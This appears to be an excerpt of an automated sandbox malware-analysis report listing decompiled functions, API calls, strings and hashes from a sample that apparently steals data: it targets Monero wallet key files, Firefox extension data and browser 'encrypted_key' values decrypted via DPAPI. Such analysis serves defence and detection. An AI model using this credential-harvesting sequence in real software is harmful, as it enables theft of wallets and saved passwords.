Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 528ea64fc0e6758fc2ade04c1e713556b7e169464e334f71bdab8a151728d2a5
Instruction ID: 610b2412d1cd31673ac42c360e972cc8474dcf466a774b9e692a2bb1e9946bf5
Opcode Fuzzy Hash: 528ea64fc0e6758fc2ade04c1e713556b7e169464e334f71bdab8a151728d2a5
Instruction Fuzzy Hash: AB417DF1801204AFDB04EFE4EC85AEE33B6BB48305F54562EF405932A1EB785994CB67

Function 0047A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0110A750,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01109178,?,\Monero\wallet.keys,00490E17), ref: 00488B86

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047A2E1
lstrlen.KERNEL32(00000000,00000000), ref: 0047A3FF
lstrlen.KERNEL32(00000000), ref: 0047A6BC

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

DeleteFileA.KERNEL32(00000000), ref: 0047A743

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 5b4c8fe9d329b781a24db64946d970d4fe8d4d7e2595b2699e3cbe3d15b56636
Instruction ID: 083da783821a49411c6cc8b97341e9c8b0f6ee616210dd508b334f5d4c27d108
Opcode Fuzzy Hash: 5b4c8fe9d329b781a24db64946d970d4fe8d4d7e2595b2699e3cbe3d15b56636
Instruction Fuzzy Hash: 44E1E3B28101189AEB04FBA5DC91EEE7338AF14304F50895FF51672091EF7C6A59CB7A

Function 0047D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0110A750,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01109178,?,\Monero\wallet.keys,00490E17), ref: 00488B86

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047D801
lstrlen.KERNEL32(00000000), ref: 0047D99F
lstrlen.KERNEL32(00000000), ref: 0047D9B3
DeleteFileA.KERNEL32(00000000), ref: 0047DA32

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: f086bb6d74f2094f927562d095ed2992d7fe8bab3a0e92b58aca0394cde0717e
Instruction ID: 5c343daa9ab4c61fccb479c1d603e00914ff5dd36714a2c01817ed9d6c46e39d
Opcode Fuzzy Hash: f086bb6d74f2094f927562d095ed2992d7fe8bab3a0e92b58aca0394cde0717e
Instruction Fuzzy Hash: F38123B18101049AEB04FBA5DC92DEE7339AF14304F50496FF106A6091EFBC6A59CB7A

Function 0047F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A

Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00491580,00490D92), ref: 0047F54C
lstrlen.KERNEL32(00000000), ref: 0047F56B

Strings

moz-extension+++, xrefs: 0047F5AD
^userContextId=4294967295, xrefs: 0047F59C

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 9e3a467a9a7052bf450c7fd0f6283fa040333ee00f5487a45c348b0042f402cc
Instruction ID: b617e1b448a33af3d705ea1fff4bf05e7be2a582f18b625ba2eb1e18ae1b044c
Opcode Fuzzy Hash: 9e3a467a9a7052bf450c7fd0f6283fa040333ee00f5487a45c348b0042f402cc
Instruction Fuzzy Hash: 76513375D00108AAEB04FBA5DC92DED7338AF54304F50892FF41667191EE7C6A19CBBA

Function 00479CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A

Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00479D39

Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
Part of subcall function 00479AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
Part of subcall function 00479AC0: LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F

Part of subcall function 00479B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00479B84
Part of subcall function 00479B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00479BA3
Part of subcall function 00479B60: LocalFree.KERNEL32(?), ref: 00479BD3

Strings

"encrypted_key":", xrefs: 00479D30
DPAPI, xrefs: 00479D89
, xrefs: 00479DC1

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: 604f1c513b820a767837de263b0705efe53ebee6a0a473cd20982bbf59c3d67e
Instruction ID: 20e1cf1ebd367fce8f6f68a24c269014fcc8f03f2359e4698146b1bc0bf204e5
Opcode Fuzzy Hash: 604f1c513b820a767837de263b0705efe53ebee6a0a473cd20982bbf59c3d67e
Instruction Fuzzy Hash: 163132B5D10109ABDF14EBE4DC85AEF77B8AB48304F14855EE905A7241F7389E04CBA5

Function 00488680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004905B7), ref: 004886CA
Process32First.KERNEL32(?,00000128), ref: 004886DE
Process32Next.KERNEL32(?,00000128), ref: 004886F3

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

CloseHandle.KERNEL32(?), ref: 00488761

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 58ca6f04c7cdd08cabe785368bfada83c8c9ad23538071c39ef1ba1a222a176d
Instruction ID: 5b326ae94f1f87f5476b603458752519d7ae1d3ae3efed5bb0860ef219c448df
Opcode Fuzzy Hash: 58ca6f04c7cdd08cabe785368bfada83c8c9ad23538071c39ef1ba1a222a176d
Instruction Fuzzy Hash: BD314F71901118ABDB24FB91CC41FEEB778EB45700F5045AEE109A2190DF786A85CFA5

Function 00486AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01108F38,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00486AE8
CloseHandle.KERNEL32(00000000), ref: 00486AF9
Sleep.KERNEL32(00001770), ref: 00486B04
CloseHandle.KERNEL32(?,00000000,?,01108F38,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486B1A
ExitProcess.KERNEL32 ref: 00486B22

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 627695089eb96dfbe65d29d220d9089b584b76264625a493db0f58cb1ac4bc76
Instruction ID: 080a5fc73e2fe60d257de9be255cead15236a871011debc00b0696390d2e56d1
Opcode Fuzzy Hash: 627695089eb96dfbe65d29d220d9089b584b76264625a493db0f58cb1ac4bc76
Instruction Fuzzy Hash: ACF03AB0944219AAE740FBA09C06BBE7B34EB04705F114E1AF512A12C1DBF96981D75B

